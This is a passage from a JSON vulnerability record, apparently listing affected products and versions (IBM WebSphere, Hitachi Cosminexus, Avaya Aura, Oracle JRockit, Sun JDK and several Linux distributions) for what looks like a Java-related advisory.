0.3, "vendor": "ibm", "version": "5.1" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cosminexus developer 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "cosminexus application server enterprise 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus client 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli provisioning manager for software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "jrockit r27.8.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cosminexus developer professional 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "cosminexus client 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ucosminexus application server enterprise 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus studio 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus studio 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.0" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "cosminexus application server 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "cosminexus studio 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "ucosminexus developer standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "quickfile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.0" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "cosminexus developer professional 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "ucosminexus application server standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.6" }, { "model": "cosminexus client 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "ucosminexus client 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "runtimes for java technology sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "cosminexus developer professional 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "cosminexus primary server base 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "cosminexus developer light 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational insight ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "cosminexus client 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "ucosminexus client 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus application server enterprise 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "web sphere real time service refresh", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "37" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus primary server base 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cosminexus developer professional 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "manager", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "111.7" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.29" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.37" }, { "model": "java se embedded 7u45", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus quickr for websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "cosminexus application server 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus primary server base 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "ucosminexus developer standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { 